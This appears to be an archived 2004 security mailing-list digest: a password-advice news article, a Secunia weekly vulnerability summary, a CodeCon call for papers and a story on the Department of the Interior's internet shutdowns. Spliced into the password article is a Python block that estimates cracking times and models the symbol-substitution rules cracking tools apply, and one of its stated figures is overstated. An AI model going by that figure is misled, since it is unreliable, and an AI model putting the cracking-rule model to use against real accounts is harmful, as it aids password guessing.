Hackers don't necessarily mind if they can't find your credit card number. Sometimes, they just want to use your Internet connection to launch further attacks. And that could cause you problems with the authorities.

"You are the one who could be held legally liable," Stute said.

Some hackers want to use computers other than their own to send out spyware, which gathers and reports information about a computer user without the user's consent, or hackers may secretly install a file, such as the latest hit movie, and make it available for illegal download by others.

"Then you've got this huge file there, and everyone's coming in and using your bandwidth access," Stute said.

Getting creative

Some people are more creative than others when choosing passwords.

Mike, a Fort Worth computer security analyst, said he uses the name of his favorite mythical creature. Helle, a Scottish woman who was recently visiting friends in Fort Worth, uses the names of her favorite hotels in Las Vegas.

Some turn their passwords into a wry joke. Liz, who works in a coffee shop in Fort Worth, makes a point to use ones such as "imbroke" and "gotnone" when signing on to sites where she pays her bill.

"I think it's funny when I'm paying my student loans in small increments that my password is something like 'moneygone,' " she said.

Janet, of Weatherford, uses her children's names and adds a number.

The real trick to a secure password is making it seem like more of a random mix of characters, including numbers and symbols, Fleming said.
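The "300,000 passwords a second" figure and the "random mix" advice can be turned into arithmetic. The Python below is an added worked example for this digest, not code from the article or from any of the firms it quotes. It assumes the article's guessing rate, a constructed cracking dictionary of 200,000 entries (a stand-in for the word-and-name lists such tools ship with), and a small table of symbol-for-letter substitutions that cracking tools commonly apply to every dictionary word; the last point goes beyond the article and explains why a disguised word such as "da11a$c0wb0y$" (the substitution trick the article describes further on) is far weaker than its character mix suggests.

```python
import string

# Assumed for this example: the article's guessing rate and a constructed
# dictionary size (real word lists plus proper names are of this order).
GUESSES_PER_SECOND = 300_000
DICTIONARY_SIZE = 200_000

# Look-alike substitutions a rule-based cracker tries for each letter of a
# dictionary word, in the style of "dallascowboys" -> "da11a$c0wb0y$".
# Each letter may appear as itself or as any of the listed symbols.
LEET = {"a": "4@", "e": "3", "i": "1!", "l": "1|", "o": "0", "s": "5$", "t": "7"}


def charset_size(password: str) -> int:
    """Number of characters a blind brute force must cover for this mix."""
    size = 0
    if any(c in string.ascii_lowercase for c in password):
        size += 26
    if any(c in string.ascii_uppercase for c in password):
        size += 26
    if any(c in string.digits for c in password):
        size += 10
    if any(c in string.punctuation for c in password):
        size += len(string.punctuation)  # the 32 printable ASCII symbols
    return size


def random_mix_guesses(password: str) -> int:
    """Guesses to exhaust every string of this length over this mix."""
    return charset_size(password) ** len(password)


def leet_variants(word: str) -> int:
    """Spellings a cracker derives from one word via optional substitutions."""
    count = 1
    for c in word.lower():
        count *= 1 + len(LEET.get(c, ""))
    return count


def dictionary_guesses(word: str, with_substitutions: bool = False) -> int:
    """Guesses to exhaust the dictionary; with substitutions, the expanded
    list is approximated by the target word's own variant count."""
    variants = leet_variants(word) if with_substitutions else 1
    return DICTIONARY_SIZE * variants


def crack_seconds(guesses: int) -> float:
    """Worst-case time at the article's rate."""
    return guesses / GUESSES_PER_SECOND


def passphrase_initials(phrase: str) -> str:
    """The article's phrase method: first letter of each word."""
    return "".join(w[0] for w in phrase.split() if w[0].isalpha())


def human(seconds: float) -> str:
    """Render a duration in the largest convenient unit."""
    units = (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60))
    for name, size in units:
        if seconds >= size:
            return f"{seconds / size:,.1f} {name}"
    return f"{seconds:.1f} seconds"


if __name__ == "__main__":
    phrase_pw = passphrase_initials("the quick brown fox jumps over the lazy dog")
    cases = [
        ("turkey (dictionary word)", dictionary_guesses("turkey")),
        ("da11a$c0wb0y$ as a substituted word", dictionary_guesses("dallascowboys", True)),
        ("da11a$c0wb0y$ as a blind random mix", random_mix_guesses("da11a$c0wb0y$")),
        ("Ab3$xy (six chars, all four classes)", random_mix_guesses("Ab3$xy")),
        (f"{phrase_pw} (phrase initials, lowercase)", random_mix_guesses(phrase_pw)),
    ]
    for label, guesses in cases:
        print(f"{label:40s} {guesses:>28,d} guesses  ~ {human(crack_seconds(guesses))}")
```

Two things the numbers show that the article only asserts: a dictionary word falls in under a second at this rate, and "da11a$c0wb0y$" drops from tens of billions of years as a blind 13-character search to about half an hour once the cracker applies substitution rules to its word list, so disguising a word buys little. The six-character all-class minimum the article's sidebar recommends holds out for weeks, not years, at 300,000 guesses per second; longer passwords, or phrase initials that are not themselves a famous quotation, scale much better.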
That should increase the time it takes to crack a password. But, given enough time and resources, hackers can crack anything. That's why security experts stress the importance of changing your password often.

But that brings the problem back full circle.

"The more frequently you change your password [or] the more complex you make your password, the more likely you are to forget it," Fleming said.

One way to remember a new, but effective, password is to pick a memorable phrase and make your password the first letter of each word. Another method is to insert symbols that resemble letters into an old password, such as turning "dallascowboys" into "da11a$c0wb0y$."

Security advances

Someday, passwords could go the way of the floppy disk and eight-track tapes. Researchers are working on more secure alternatives, such as systems that use visual passwords.

Users are shown a series of pictures or abstract images and are asked to pick several that seem familiar to them. Those images become their password. To sign on, users pick their pictures from a group of random images.

What makes a graphical password system so attractive is that it's difficult to tell anyone else your password or to write it down.

Another avenue is biometric devices such as facial scanners. They make it impossible for anyone but the user to sign on to a given system. Microsoft founder Bill Gates has suggested that biometrics are the future of computer security, and Microsoft has introduced a keyboard with a fingerprint reader.

"All the James Bond stuff we've seen over the years may someday be our reality," Fleming said.

IN THE KNOW

What makes a good password?

* It should be at least six characters long with upper and lowercase letters, plus symbols and numbers if the site or program allows it.
* Avoid names, birthdays, telephone numbers or Social Security numbers.
* Devise an acronym using a nonsense phrase or a sequence you can remember, like a line from a song or the initials and ages of several friends.
* Vary your passwords often. You should change them at least every two months for sites or programs containing sensitive information.

SOURCES: Mike Stute of Global DataGuard in Dallas and Rick Fleming of Digital Defense, a San Antonio-based network security firm

From isn at c4i.org Fri Dec 10 05:28:04 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 10 05:56:14 2004
Subject: [ISN] Secunia Weekly Summary - Issue: 2004-50
Message-ID:

========================================================================

The Secunia Weekly Advisory Summary
2004-12-02 - 2004-12-09

This week : 46 advisories

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3...............................This Weeks Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

Monitor, Filter, and Manage Security Information
- Filtering and Management of Secunia advisories
- Overview, documentation, and detailed reports
- Alerting via email and SMS

Request Trial:
https://ca.secunia.com/?f=s

========================================================================
2) This Week in Brief:

ADVISORIES:

Secunia Research has reported a vulnerability, which affects most browsers. The vulnerability allows a malicious web site to "hi-jack" a trusted site's pop-up window.

This could be exploited by phishers to convince people into disclosing confidential information, or to download and install malicious programs, which the user believes comes from a trusted web site.
Secunia has constructed a test, which can be used to check if your browser is affected by this issue:
http://secunia.com/multiple_browsers_window_injection_vulnerability_test/

Please refer to the test above, or the Secunia advisories below, for additional details.

References:
http://secunia.com/SA13251/
http://secunia.com/SA13129/
http://secunia.com/SA13253/
http://secunia.com/SA13254/
http://secunia.com/SA13252/
http://secunia.com/SA13402/

--

Apple has issued a new Mac OS X Security Update, which fixes multiple vulnerabilities. An extensive round-up of the vulnerabilities is available in the referenced Secunia advisory below.

References:
http://secunia.com/SA13362

VIRUS ALERTS:

Secunia has not issued any virus alerts during the last week.

========================================================================
3) This Week's Top Ten Most Read Advisories:

1. [SA13129] Mozilla / Mozilla Firefox Window Injection Vulnerability
2. [SA13251] Microsoft Internet Explorer Window Injection Vulnerability
3. [SA12959] Internet Explorer HTML Elements Buffer Overflow Vulnerability
4. [SA13362] Mac OS X Security Update Fixes Multiple Vulnerabilities
5. [SA12889] Microsoft Internet Explorer Two Vulnerabilities
6. [SA13269] Winamp "IN_CDDA.dll" Buffer Overflow Vulnerability
7. [SA13252] Safari Window Injection Vulnerability
8. [SA13253] Opera Window Injection Vulnerability
9. [SA13402] Netscape Window Injection Vulnerability
10. [SA13254] Konqueror Window Injection Vulnerability

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA13391] GetRight "DUNZIP32.dll" Buffer Overflow Vulnerability
[SA13365] Microsoft Browser Client Context Tool Three Vulnerabilities
[SA13361] Kreed Format String and Denial of Service Vulnerabilities
[SA13368] Battlefield 1942 / Battlefield Vietnam Denial of Service Vulnerability
[SA13389] Remote Execute Multiple Connection Denial of Service Vulnerability
[SA13372] Cisco CNS Network Registrar Denial of Service Vulnerabilities
[SA13396] Microsoft Internet Explorer "sysimage:" Local File Detection Weakness

UNIX/Linux:
[SA13406] Red Hat update for ImageMagick
[SA13395] SUSE Updates for Multiple Packages
[SA13386] Mandrake update for ImageMagick
[SA13382] Gentoo update for imlib
[SA13381] Imlib Image Decoding Integer Overflow Vulnerabilities
[SA13378] LessTif libXpm Multiple Image Processing Vulnerabilities
[SA13373] Gentoo update for pdflib
[SA13366] SUSE update for cyrus-imapd
[SA13362] Mac OS X Security Update Fixes Multiple Vulnerabilities
[SA13380] Debian update for ViewCVS
[SA13367] Darwin Streaming Server "DESCRIBE" Request Denial of Service Vulnerability
[SA13358] Big Medium Unspecified Script Upload Vulnerability
[SA13401] Sun Solaris in.rwhod Unspecified Vulnerability
[SA13371] Debian hpsockd Buffer Overflow Vulnerability
[SA13359] Red Hat update for kernel
[SA13407] Fedora update for mysql
[SA13403] Debian update for nfs-utils
[SA13390] Mandrake update for nfs-utils
[SA13384] nfs-utils "SIGPIPE" TCP Connection Termination Denial of Service Vulnerability
[SA13405] rootsh Escape Sequences Logging Security Bypass
[SA13392] Gentoo mirrorselect Insecure Temporary File Creation Vulnerability
[SA13388] Gentoo update for perl
[SA13387] Mandrake update for gzip
[SA13385] Mandrake update for lvm
[SA13383] Mandrake update for openssl
[SA13379] Gentoo rssh Arbitrary Command Execution Vulnerability
[SA13376] file Unspecified ELF Header Parsing Vulnerability
[SA13370] AIX Unspecified System Startup Scripts Vulnerability
[SA13369] Gentoo update for scponly
[SA13364] scponly Security Bypass Arbitrary Command Execution Vulnerability
[SA13363] rssh Security Bypass Arbitrary Command Execution Vulnerability

Other:

Cross Platform:
[SA13402] Netscape Window Injection Vulnerability
[SA13400] WebLibs Directory Traversal Vulnerability
[SA13375] ViewCVS Restricted Directory Access Security Bypass
[SA13397] MaxDB Web Tools Buffer Overflow and Denial of Service Vulnerabilities
[SA13393] Codestriker Unspecified Repository Security Bypass Issue
[SA13360] Jakarta Lucene "results.jsp" Cross-Site Scripting Vulnerability
[SA13357] Serendipity "searchTerm" Cross-Site Scripting Vulnerability
[SA13377] Novell NetMail Default NMAP Authentication Credential Security Issue

========================================================================
5) Vulnerabilities Content Listing

Windows:--

[SA13391] GetRight "DUNZIP32.dll" Buffer Overflow Vulnerability

Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-07

ATmaCA has reported a vulnerability in GetRight, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13391/

--

[SA13365] Microsoft Browser Client Context Tool Three Vulnerabilities

Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, System access
Released: 2004-12-07

Nicolas Gregoire has reported some vulnerabilities in Microsoft Browser Client Context Tool (W3Who.dll), which can be exploited by malicious people to conduct cross-site scripting attacks or potentially compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/13365/

--

[SA13361] Kreed Format String and Denial of Service Vulnerabilities

Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2004-12-03

Luigi Auriemma has reported some vulnerabilities in Kreed, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13361/

--

[SA13368] Battlefield 1942 / Battlefield Vietnam Denial of Service Vulnerability

Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2004-12-07

Luigi Auriemma has reported a vulnerability in Battlefield 1942 and Battlefield Vietnam, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/13368/

--

[SA13389] Remote Execute Multiple Connection Denial of Service Vulnerability

Critical: Less critical
Where: From local network
Impact: DoS
Released: 2004-12-07

Paul Craig has reported a vulnerability in Remote Execute, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/13389/

--

[SA13372] Cisco CNS Network Registrar Denial of Service Vulnerabilities

Critical: Less critical
Where: From local network
Impact: DoS
Released: 2004-12-03

Qualys Security Research Team has reported two vulnerabilities in Cisco CNS Network Registrar, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/13372/

--

[SA13396] Microsoft Internet Explorer "sysimage:" Local File Detection Weakness

Critical: Not critical
Where: From remote
Impact: Exposure of system information
Released: 2004-12-08

Gregory R. Panakkal has discovered a weakness in Internet Explorer, which can be exploited by malicious people to detect the presence of local files.
Full Advisory:
http://secunia.com/advisories/13396/

UNIX/Linux:--

[SA13406] Red Hat update for ImageMagick

Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-09

Red Hat has issued an update for ImageMagick. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13406/

--

[SA13395] SUSE Updates for Multiple Packages

Critical: Highly critical
Where: From remote
Impact: Privilege escalation, DoS, System access
Released: 2004-12-08

SUSE has issued updates for multiple packages. These fix various vulnerabilities, which can be exploited to overwrite files, gain escalated privileges, or potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13395/

--

[SA13386] Mandrake update for ImageMagick

Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-07

MandrakeSoft has issued an update for ImageMagick. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13386/

--

[SA13382] Gentoo update for imlib

Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2004-12-07

Gentoo has issued an update for imlib. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13382/

--

[SA13381] Imlib Image Decoding Integer Overflow Vulnerabilities

Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2004-12-07

Pavel Kankovsky has reported multiple vulnerabilities in imlib, which potentially can be exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/13381/

--

[SA13378] LessTif libXpm Multiple Image Processing Vulnerabilities

Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2004-12-06

Multiple vulnerabilities have been reported in LessTif, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13378/

--

[SA13373] Gentoo update for pdflib

Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2004-12-06

Gentoo has issued an update for pdflib. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system or cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/13373/

--

[SA13366] SUSE update for cyrus-imapd

Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-06

SUSE has issued an update for cyrus-imapd. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13366/

--

[SA13362] Mac OS X Security Update Fixes Multiple Vulnerabilities

Critical: Highly critical
Where: From remote
Impact: Security Bypass, Spoofing, Exposure of sensitive information, Privilege escalation, DoS, System access
Released: 2004-12-03

Apple has issued a security update for Mac OS X, which fixes various vulnerabilities.

Full Advisory:
http://secunia.com/advisories/13362/

--

[SA13380] Debian update for ViewCVS

Critical: Moderately critical
Where: From remote
Impact: Security Bypass
Released: 2004-12-06

Debian has issued an update for viewcvs. This fixes a vulnerability, which can be exploited by malicious users to bypass certain security restrictions.
Full Advisory:
http://secunia.com/advisories/13380/

--

[SA13367] Darwin Streaming Server "DESCRIBE" Request Denial of Service Vulnerability

Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2004-12-08

A vulnerability has been reported in Darwin Streaming Server, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/13367/

--

[SA13358] Big Medium Unspecified Script Upload Vulnerability

Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-12-02

A vulnerability has been reported in Big Medium, which potentially can be exploited by malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13358/

--

[SA13401] Sun Solaris in.rwhod Unspecified Vulnerability

Critical: Moderately critical
Where: From local network
Impact: System access
Released: 2004-12-08

A vulnerability has been reported in Sun Solaris, which can be exploited by malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13401/

--

[SA13371] Debian hpsockd Buffer Overflow Vulnerability

Critical: Moderately critical
Where: From local network
Impact: DoS, System access
Released: 2004-12-03

infamous41md has reported a vulnerability in hpsockd, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13371/

--

[SA13359] Red Hat update for kernel

Critical: Moderately critical
Where: From local network
Impact: Security Bypass, Privilege escalation, DoS
Released: 2004-12-03

Red Hat has issued an update for the kernel. This fixes multiple vulnerabilities, which potentially can be exploited to gain escalated privileges, bypass certain security restrictions, or cause a DoS (Denial of Service).
Full Advisory:
http://secunia.com/advisories/13359/

--

[SA13407] Fedora update for mysql

Critical: Less critical
Where: From local network
Impact: Security Bypass, Privilege escalation, DoS, System access
Released: 2004-12-09

Fedora has issued an update for mysql. This fixes multiple vulnerabilities, which can be exploited to perform certain actions on a system with escalated privileges, bypass certain security restrictions, cause a DoS (Denial of Service), or potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13407/

--

[SA13403] Debian update for nfs-utils

Critical: Less critical
Where: From local network
Impact: DoS
Released: 2004-12-09

Debian has issued an update for nfs-utils. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/13403/

--

[SA13390] Mandrake update for nfs-utils

Critical: Less critical
Where: From local network
Impact: DoS
Released: 2004-12-07

MandrakeSoft has issued an update for nfs-utils. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/13390/

--

[SA13384] nfs-utils "SIGPIPE" TCP Connection Termination Denial of Service Vulnerability

Critical: Less critical
Where: From local network
Impact: DoS
Released: 2004-12-07

SGI has reported a vulnerability in nfs-utils, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/13384/

--

[SA13405] rootsh Escape Sequences Logging Security Bypass

Critical: Less critical
Where: Local system
Impact: Security Bypass
Released: 2004-12-09

A security issue has been reported in rootsh, which can be exploited by malicious, local users to bypass the logging functionality.
Full Advisory:
http://secunia.com/advisories/13405/

--

[SA13392] Gentoo mirrorselect Insecure Temporary File Creation Vulnerability

Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-07

Ervin Nemeth has reported a vulnerability in mirrorselect, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory:
http://secunia.com/advisories/13392/

--

[SA13388] Gentoo update for perl

Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-07

Gentoo has issued an update for perl. This fixes some vulnerabilities, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory:
http://secunia.com/advisories/13388/

--

[SA13387] Mandrake update for gzip

Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-07

MandrakeSoft has issued an update for gzip. This fixes some vulnerabilities, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory:
http://secunia.com/advisories/13387/

--

[SA13385] Mandrake update for lvm

Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-07

MandrakeSoft has issued an update for lvm. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory:
http://secunia.com/advisories/13385/

--

[SA13383] Mandrake update for openssl

Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-07

MandrakeSoft has issued an update for openssl. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.
Full Advisory:
http://secunia.com/advisories/13383/

--

[SA13379] Gentoo rssh Arbitrary Command Execution Vulnerability

Critical: Less critical
Where: Local system
Impact: Security Bypass
Released: 2004-12-06

Gentoo has acknowledged a vulnerability in rssh, which can be exploited by malicious users to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/13379/

--

[SA13376] file Unspecified ELF Header Parsing Vulnerability

Critical: Less critical
Where: Local system
Impact: Unknown
Released: 2004-12-06

A vulnerability with an unknown impact has been reported in file.

Full Advisory:
http://secunia.com/advisories/13376/

--

[SA13370] AIX Unspecified System Startup Scripts Vulnerability

Critical: Less critical
Where: Local system
Impact: Manipulation of data, DoS
Released: 2004-12-03

A vulnerability has been reported in AIX, which can be exploited by malicious, local users to inject arbitrary data into the ODM (Object Data Manager) or cause a vulnerable system to hang during boot.

Full Advisory:
http://secunia.com/advisories/13370/

--

[SA13369] Gentoo update for scponly

Critical: Less critical
Where: Local system
Impact: Security Bypass
Released: 2004-12-06

Gentoo has issued an update for scponly. This fixes a vulnerability, which can be exploited by malicious users to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/13369/

--

[SA13364] scponly Security Bypass Arbitrary Command Execution Vulnerability

Critical: Less critical
Where: Local system
Impact: Security Bypass
Released: 2004-12-03

Jason Wies has reported a vulnerability in scponly, which can be exploited by malicious users to bypass certain security restrictions.
Full Advisory:
http://secunia.com/advisories/13364/

--

[SA13363] rssh Security Bypass Arbitrary Command Execution Vulnerability

Critical: Less critical
Where: Local system
Impact: Security Bypass
Released: 2004-12-03

Jason Wies has reported a vulnerability in rssh, which can be exploited to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/13363/

Other:

Cross Platform:--

[SA13402] Netscape Window Injection Vulnerability

Critical: Moderately critical
Where: From remote
Impact: Spoofing
Released: 2004-12-08

A vulnerability has been reported in Netscape, which can be exploited by malicious people to spoof the content of websites.

Full Advisory:
http://secunia.com/advisories/13402/

--

[SA13400] WebLibs Directory Traversal Vulnerability

Critical: Moderately critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information
Released: 2004-12-08

John Bissell has reported a vulnerability in WebLibs, which can be exploited by malicious people to access sensitive information.

Full Advisory:
http://secunia.com/advisories/13400/

--

[SA13375] ViewCVS Restricted Directory Access Security Bypass

Critical: Moderately critical
Where: From remote
Impact: Security Bypass
Released: 2004-12-06

Hajvan Sehic has reported a vulnerability in ViewCVS, which can be exploited by malicious users to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/13375/

--

[SA13397] MaxDB Web Tools Buffer Overflow and Denial of Service Vulnerabilities

Critical: Moderately critical
Where: From local network
Impact: DoS, System access
Released: 2004-12-08

Evgeny Demidov has reported two vulnerabilities in MaxDB, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/13397/

--

[SA13393] Codestriker Unspecified Repository Security Bypass Issue

Critical: Less critical
Where: From remote
Impact: Security Bypass
Released: 2004-12-08

A security issue has been reported in Codestriker, which can be exploited by malicious users to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/13393/

--

[SA13360] Jakarta Lucene "results.jsp" Cross-Site Scripting Vulnerability

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-12-03

A vulnerability has been reported in Jakarta Lucene, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/13360/

--

[SA13357] Serendipity "searchTerm" Cross-Site Scripting Vulnerability

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-12-02

Stefan Esser has reported a vulnerability in Serendipity, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/13357/

--

[SA13377] Novell NetMail Default NMAP Authentication Credential Security Issue

Critical: Less critical
Where: From local network
Impact: Manipulation of data, Exposure of system information, Exposure of sensitive information
Released: 2004-12-06

A security issue has been reported in NetMail, which can be exploited by malicious people to access the mail store.

Full Advisory:
http://secunia.com/advisories/13377/

========================================================================

Secunia recommends that you verify all advisories you receive, by clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe:
http://secunia.com/secunia_weekly_summary/

Contact details:
Web : http://secunia.com/
E-mail : support@secunia.com
Tel : +45 70 20 51 44
Fax : +45 70 20 51 45

========================================================================

From isn at c4i.org Fri Dec 10 05:38:16 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 10 05:56:16 2004
Subject: [ISN] CodeCon CFP deadline nearing
Message-ID:

Forwarded from: Len Sassaman

CodeCon 4.0
February 11-13, 2005
San Francisco CA, USA
www.codecon.org

Call For Papers

CodeCon is the premier showcase of cutting edge software development. It is an excellent opportunity for programmers to demonstrate their work and keep abreast of what's going on in their community.

All presentations must include working demonstrations, ideally accompanied by source code. Presentations must be given by one of the active developers of the code in question. We emphasize that demonstrations be of *working* code.

We hereby solicit papers and demonstrations.

* Papers and proposals due: December 15, 2004
* Authors notified: January 1, 2005

Possible topics include, but are by no means restricted to:

* community-based web sites - forums, weblogs, personals
* development tools - languages, debuggers, version control
* file sharing systems - swarming distribution, distributed search
* security products - mail encryption, intrusion detection, firewalls

Presentations will be 45 minutes long, with 15 minutes allocated for Q&A. Overruns will be truncated.

Submission details:

Submissions are being accepted immediately. Acceptance dates are November 15, and December 15. After the first acceptance date, submissions will be either accepted, rejected, or deferred to the second acceptance date.

The conference language is English.

Ideally, demonstrations should be usable by attendees with 802.11b connected devices either via a web interface, or locally on Windows, UNIX-like, or MacOS platforms.
Cross-platform applications are most desirable. Our venue will be 21+.

To submit, send mail to submissions-2005@codecon.org including the following information:

* Project name
* url of project home page
* tagline - one sentence or less summing up what the project does
* names of presenter(s) and urls of their home pages, if they have any
* one-paragraph bios of presenters, optional, under 100 words each
* project history, under 150 words
* what will be done in the project demo, under 200 words
* slides to be shown during the presentation, if applicable
* future plans

General Chairs: Jonathan Moore, Len Sassaman
Program Chair: Bram Cohen

Program Committee:

* Jeremy Bornstein, AtomShockwave Corp., USA
* Bram Cohen, BitTorrent, USA
* Jered Floyd, Permabit, USA
* Ian Goldberg, Zero-Knowledge Systems, CA
* Dan Kaminsky, Avaya, USA
* Klaus Kursawe, Katholieke Universiteit Leuven, BE
* Ben Laurie, A.L. Digital Ltd., UK
* David Molnar, University of California, Berkeley, USA
* Jonathan Moore, Mosuki, USA
* Len Sassaman, Nomen Abditum Services, USA

Sponsorship:

If your organization is interested in sponsoring CodeCon, we would love to hear from you. In particular, we are looking for sponsors for social meals and parties on any of the three days of the conference, as well as sponsors of the conference as a whole and donors of door prizes. If you might be interested in sponsoring any of these aspects, please contact the conference organizers at codecon-admin@codecon.org.

Press policy:

CodeCon provides a limited number of passes to bona fide press. Complimentary press passes will be evaluated on request. Everyone is welcome to pay the low registration fee to attend without an official press credential.

Questions:

If you have questions about CodeCon, or would like to contact the organizers, please mail codecon-admin@codecon.org. Please note this address is only for questions and administrative requests, and not for workshop presentation submissions.
From isn at c4i.org Fri Dec 10 05:38:35 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 10 05:56:18 2004
Subject: [ISN] DOI averts online shutdown
Message-ID:

http://www.nwfusion.com/news/2004/1209doi.html

By John Fontana
Network World Fusion
12/09/04

Three years after a judge's ruling in a class-action lawsuit unplugged the Department of Interior and its eight agencies from the Internet for four chaotic months, the department is still fighting to stay online, having averted its third ordered shutdown earlier this month.

Since the chaos of 2001, the DOI has invested millions to improve computer security, a trend that observers say is cutting across the federal government.

The latest DOI Internet blackout was avoided when the U.S. Court of Appeals for the D.C. Circuit ruled on Dec. 3 that U.S. District Judge Royce Lamberth ignored evidence showing the DOI had addressed his concerns over computer security. Those concerns are part of an eight-year-old class action lawsuit, Cobell vs. Norton, over the mismanagement of Indian trust funds, filed by 300,000 Native Americans against the DOI, which oversees the Bureau of Indian Affairs (BIA).

Lamberth ordered the shutdown in March 2004, which put the DOI offline for several days before a stay was granted. The Dec. 3 ruling overturned Lamberth's order.

The Internet shutdowns all started in December 2001, when Lamberth ruled that the government breached its trust obligations, resulting in accounting errors for some $10 billion owed to Native Americans, and he ordered an overhaul of DOI systems. The BIA systems were so bad that the DOI could not determine which systems housed Indian trust data, and DOI was ordered to take all eight agencies offline, bringing four months of chaos that showed just how entrenched the Internet had become in the day-to-day life of the government. Ironically, those hurt worst were Native Americans, who went without their existing trust payments as systems were hogtied.
To this day, the BIA remains disconnected from the Internet pending a settlement. But the DOI's other seven agencies are all back up and online, including the Minerals Management Service, Bureau of Land Management, the Fish and Wildlife Service, the Office of Surface Mining and the National Park Service.

And the DOI is busy working on its computer security. In the past two years, the BIA has allocated more than $50 million to overhaul its computer systems and network, including firewalls, other security software and a new IT center in suburban Washington, D.C., according to the DOI. Dave Anderson, who took over as head of the BIA earlier this year, said during a February tour he conducted for tribal leaders that the facility's network is the "most sophisticated" within the DOI.

"The department has made significant investment in IT security," says Dan DuBray, acting press secretary for the DOI. "Those investments have provided multiple hardening of these systems that house Indian trust data."

DuBray says the DOI believes that the data in question is now among the most secure in the federal government. He declined to provide details on the security measures deployed.

But experts say the federal government in general is working to harden its computer systems, especially in light of the Federal Information Security Management Act, which was enacted in 2002 and ties funding for federal information technology projects to security compliance, and the Sept. 11 attacks.

"Those agencies involved in national security have spent billions of dollars with a focus on information security," says Ray Bjorklund, senior vice president and chief knowledge officer for Federal Sources, a research firm focused on public sector IT. "The civil agencies are putting more energy into bolstering information security. It is hard to put an exact dollar amount on these things, but they are spending billions of dollars per year on security."
From isn at c4i.org Fri Dec 10 05:39:19 2004
From: isn at c4i.org (InfoSec News)
